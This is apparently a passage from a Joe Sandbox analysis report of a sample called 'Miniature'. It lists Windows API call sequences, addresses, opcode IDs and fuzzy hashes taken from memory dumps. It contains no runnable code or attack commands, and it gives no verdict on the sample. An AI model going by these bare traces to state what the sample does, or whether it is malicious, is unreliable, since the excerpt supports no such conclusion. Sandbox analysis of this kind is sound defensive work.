                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9202d344fbd00a208ef179e62830a1de2380e84487a3a96dcf09863fbc6e2b05
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6711DB76900258BBCB019FA89C45BDF7FADEB4A324F148256F927D72A0D67489048B61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,?,00C3D369,00000000,00000004,00000000), ref: 00C3D588
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C3D594
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C3D59B
                                                                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00C3D5B9
Similarity
• API ID: Thread$CreateErrorLastResume__dosmaperr
• String ID:
• API String ID: 173952441-0
• Opcode ID: 9ac385b351646522b786b727a5a641f05c313c21534b9d1666f91c8b0e8fa01e
• Instruction ID: a95b76c0d77ae2d1dda6750b50b3185b12599d62ed34bb3799dd6eacf94d3cd9
• Opcode Fuzzy Hash: 9ac385b351646522b786b727a5a641f05c313c21534b9d1666f91c8b0e8fa01e
• Instruction Fuzzy Hash: 7B01F9B24252147BCB116FA5FC05BAE7B69EF81335F100219F927871E0DB708901D7A1
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C178B1
• GetStockObject.GDI32(00000011), ref: 00C178C5
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00C178CF
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: 4244dc4eb75e590872c54ca0277f5568ace991f678978f968192211b3570816b
• Instruction ID: f5de5ebc30fbb754aafb0ef3fb0d9d103e2e793a2e947f32f3dc497cc68e0ef6
• Opcode Fuzzy Hash: 4244dc4eb75e590872c54ca0277f5568ace991f678978f968192211b3570816b
• Instruction Fuzzy Hash: EF11A172505548BFEF065F90CC58FEA7B69FF0A368F040215FA12A6160DB319CA0FBA0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00C4338D,00000364,00000000,00000000,00000000,?,00C435FE,00000006,FlsSetValue), ref: 00C43418
• GetLastError.KERNEL32(?,00C4338D,00000364,00000000,00000000,00000000,?,00C435FE,00000006,FlsSetValue,00CB3260,FlsSetValue,00000000,00000364,?,00C431B9), ref: 00C43424
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C4338D,00000364,00000000,00000000,00000000,?,00C435FE,00000006,FlsSetValue,00CB3260,FlsSetValue,00000000), ref: 00C43432
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 936b75a13d1c1ef3d9fe9b16f78e7c74c1b99022f8cc34d4d57040d08e238d10
• Instruction ID: 7993513d3d8bc36e0c3e3dc2279963690771db861ec5e7ade96fe662549ba8e8
• Opcode Fuzzy Hash: 936b75a13d1c1ef3d9fe9b16f78e7c74c1b99022f8cc34d4d57040d08e238d10
• Instruction Fuzzy Hash: 4201A732711262ABCB224B799C44BDA7FA8BF95B757211620FA17D7580D720DF01C6E0
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C7B69A,?,00008000), ref: 00C7BA8B
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C7B69A,?,00008000), ref: 00C7BAB0
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C7B69A,?,00008000), ref: 00C7BABA
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C7B69A,?,00008000), ref: 00C7BAED
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: b5026b6881c8737fabd4c4c54cb3ab39546a2a49c2724aeea26ce2948ea99674
• Instruction ID: 312f8bca497adf1c874399532465ab3fb9b79ca7708a673e0cccd0fa3f1be3b3
• Opcode Fuzzy Hash: b5026b6881c8737fabd4c4c54cb3ab39546a2a49c2724aeea26ce2948ea99674
• Instruction Fuzzy Hash: 2B113931C00629EBCF00AFA5E9497EEBB78BF09721F108095E946B2550CB309A519BA5
APIs
• GetWindowRect.USER32(?,?), ref: 00CA888E
• ScreenToClient.USER32(?,?), ref: 00CA88A6
• ScreenToClient.USER32(?,?), ref: 00CA88CA
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CA88E5
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: a0ebc9f14ce9351465f1ccc09bcb53c13edc52fc8a51c9c55d6740ac4805688d
• Instruction ID: c10b91e8f130559e18ed4df7c46ef1ae7d8dbe81ffb811a9742e82153e9b94b4
• Opcode Fuzzy Hash: a0ebc9f14ce9351465f1ccc09bcb53c13edc52fc8a51c9c55d6740ac4805688d
• Instruction Fuzzy Hash: 381140B9D0020AAFDB41CFA8C884AEEBBB5FF09314F508166E915E3650D735AA54CF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C73712
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C73723
                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C7372A
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C73731
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6cbc509ca037cd343da8d11e795990448aa6fff091486f5b4b4a651df0f37364
                                                                                                                                                                                                                                                                                            • Instruction ID: c459fe5cef7d84bd86f97468a1a8aca008270ad494bc081130fa4c00b3c29c51
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cbc509ca037cd343da8d11e795990448aa6fff091486f5b4b4a651df0f37364
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8FE06DB1101264BADA241BA29C4DFEF7F6CDB43BA5F004015F20BD6480DAA08A80D2B1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C11F87
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: SelectObject.GDI32(?,00000000), ref: 00C11F96
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: BeginPath.GDI32(?), ref: 00C11FAD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: SelectObject.GDI32(?,00000000), ref: 00C11FD6
                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00CA92E3
                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 00CA92F0
                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 00CA9300
                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 00CA930E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1de3964e7f8be0866f9338717b40d525e211e183a9ab2d60af2b5b03251925b1
                                                                                                                                                                                                                                                                                            • Instruction ID: 15eb2c754573cfdcfc3154f4bd01e4316e12d9dd4d0aa9a0884aa46f623aa284
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1de3964e7f8be0866f9338717b40d525e211e183a9ab2d60af2b5b03251925b1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9F05E31006259BADB125F54AC0EFCE3F69AF0B328F048000FA13260E2C7759662ABA5
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000008), ref: 00C121BC
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00C121C6
                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00C121D9
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 00C121E1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7b84c4a1e69f5afde727860f259253db4d4b95b4a7f8fefd5dc47c2cef7dc0aa
                                                                                                                                                                                                                                                                                            • Instruction ID: 113cb5132150351836454c2fcda0343cb1f6dcff18fec41cdc55d405b68fdb61
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b84c4a1e69f5afde727860f259253db4d4b95b4a7f8fefd5dc47c2cef7dc0aa
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39E06535240280AADB215B74AC097EC7B21AB1333AF148219F7B7550E1C77146859B10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C6EC36
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C6EC40
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C6EC60
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 00C6EC81
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 10d0628853ed2183c4c8d5d07fc63fa167ee0ddfecf75aa1fe178fd3e212f5c9
                                                                                                                                                                                                                                                                                            • Instruction ID: 23c15c9c0cb51adfb4ebd3dd793acdd5bc9eee3f3d1f0e988cabb94252e8e7de
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10d0628853ed2183c4c8d5d07fc63fa167ee0ddfecf75aa1fe178fd3e212f5c9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01E01AB4C00204EFCB40AFA0D948B9DBBB1EB49315F108809F84BE3650C7385942EF00
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C6EC4A
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C6EC54
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C6EC60
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 00C6EC81
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5176559743a8a40e7d31e0f7be0e43fc81f83539d3c68d4b1f720f7c07761f08
                                                                                                                                                                                                                                                                                            • Instruction ID: 81bf34d8643601eb81b4421828884bbc55c60988982adb97fa7dc358aa9da2f2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5176559743a8a40e7d31e0f7be0e43fc81f83539d3c68d4b1f720f7c07761f08
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EE012B0C00204EFCB40AFA0D908B9DBBB1AB49315B108809F84BE3650CB386A02AF00
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C141EA: _wcslen.LIBCMT ref: 00C141EF
                                                                                                                                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C85919
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                            • String ID: *$LPT
                                                                                                                                                                                                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                            • Opcode ID: 56333b6f0a324e59b3370ad5482479aafa7237189b8fb6a63549675d1b4b15a2
                                                                                                                                                                                                                                                                                            • Instruction ID: e837f50a5497722944f5103bf549b85b18a232b66f3249cb8131df22380ebac1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56333b6f0a324e59b3370ad5482479aafa7237189b8fb6a63549675d1b4b15a2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3919F75A00604DFCB14EF54C4C4EAABBF1AF45318F188099E85A5F392C7B1EE86DB94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00C3E67D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                            • Opcode ID: 25588f7de343c838b53348785c86b73a8dda621e7a2c771aa40809074630be5d
                                                                                                                                                                                                                                                                                            • Instruction ID: 56db96b799242b02cf34ee3fbf5d7fe1bc4ae51f5bfd36f42bd4546aa2dd8f9d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25588f7de343c838b53348785c86b73a8dda621e7a2c771aa40809074630be5d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40519E61E2810686CB117714CD423BE3BB4FB50750F304E5AF0B2422E8EF358F8AAB46
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                            • Opcode ID: c24e09fc4dc4d6d6dec10845927a6fd710eba21b0477fa0cb6ef25a8fb966aa5
                                                                                                                                                                                                                                                                                            • Instruction ID: e4e9ab13f49a6b55243fc25da29ee501ffc6fee5b526e96f580ca7a462ab93b9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c24e09fc4dc4d6d6dec10845927a6fd710eba21b0477fa0cb6ef25a8fb966aa5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6514031504256DFCF25EF29D091AFE7BA0EF16310F24415AF8A29B290DF309E86DB61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00C2F6DB
                                                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C2F6F4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                            • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                            • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C8DB75
                                                                                                                                                                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C8DB7F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                            • String ID: |
                                                                                                                                                                                                                                                                                            • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00CA40BD
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CA40F8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00CA50BD
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CA50D2
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C178B1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: GetStockObject.GDI32(00000011), ref: 00C178C5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C178CF
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00CA4216
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00CA4230
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C8D7C2
                                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C8D7EB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 00C7761D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C77629
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: STOP
                                                                                                                                                                                                                                                                                            • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C72699
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C72593
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
